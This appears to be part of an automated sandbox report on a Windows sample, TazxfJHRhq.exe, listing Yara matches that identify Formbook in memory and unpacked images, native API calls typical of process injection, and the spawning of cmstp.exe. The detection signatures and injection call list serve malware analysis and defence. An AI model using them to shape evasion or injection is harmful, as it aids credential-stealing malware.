Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004181C0 NtCreateFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00418270 NtReadFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004182F0 NtClose
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00418272 NtReadFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB95D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9820 NtEnumerateKey
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABB040 NtSuspendThread
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB99D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9950 NtQueueApcThread
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9A10 NtQuerySection
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9B00 NtSetValueKey
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABAD30 NtSetContextThread
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9560 NtWriteFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB96D0 NtCreateKey
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9650 NtQueryValueKey
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA710 NtOpenProcessToken
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9760 NtOpenProcess
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB9770 NtSetInformationFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ABA770 NtOpenThread
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004181C0 NtCreateFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00418270 NtReadFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004182F0 NtClose
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004183A0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00418272 NtReadFile
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046295D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046296D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046299A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629560 NtWriteFile
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046295F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629760 NtOpenProcess
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A770 NtOpenThread
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629770 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046297A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462B040 NtSuspendThread
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629820 NtEnumerateKey
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046298F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046298A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629950 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046299D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A20 NtResumeThread
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A10 NtQuerySection
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04629B00 NtSetValueKey
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0462A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004181C0 NtCreateFile
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00418270 NtReadFile
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004182F0 NtClose
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004183A0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00418272 NtReadFile
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004046A7
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00401030
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00408C5B
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00408C60
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B569
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041BD6A
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402D87
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041CEAF
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B7B5
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B420A8
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B090
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B428EC
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B4E824
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31002
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7F900
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B422AE
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAEBB0
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3DBD2
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B303DA
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B42B28
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8841F
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3D466
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2581
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8D5E0
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B425DD
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A70D20
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B42D07
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B41D55
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B42EF7
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A96E30
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3D616
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B41FF1
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B4DFCE
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00401030
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00408C5B
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00408C60
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B569
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041BD6A
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00402D87
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_00402D90
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046AD466
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045F841F
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B1D55
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B2D07
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045E0D20
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B25DD
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FD5E0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04612581
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04606E30
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046AD616
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B2EF7
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B1FF1
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046BDFCE
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046BE824
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A1002
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B28EC
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046120A0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B20A8
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045FB090
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04604120
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_045EF900
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0469FA2B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B22AE
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0460AB40
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046B2B28
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046A03DA
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046ADBD2
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0461EBB0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00408C5B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00408C60
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B569
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00402D87
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00402D90
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041CEAF
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00402FB0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B7B5
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: String function: 00419F70 appears 36 times
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: String function: 00A7B150 appears 45 times
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 045EB150 appears 48 times
Source: TazxfJHRhq.exe, 00000000.00000003.211457812.000000001F016000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCMSTP.EXE` vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
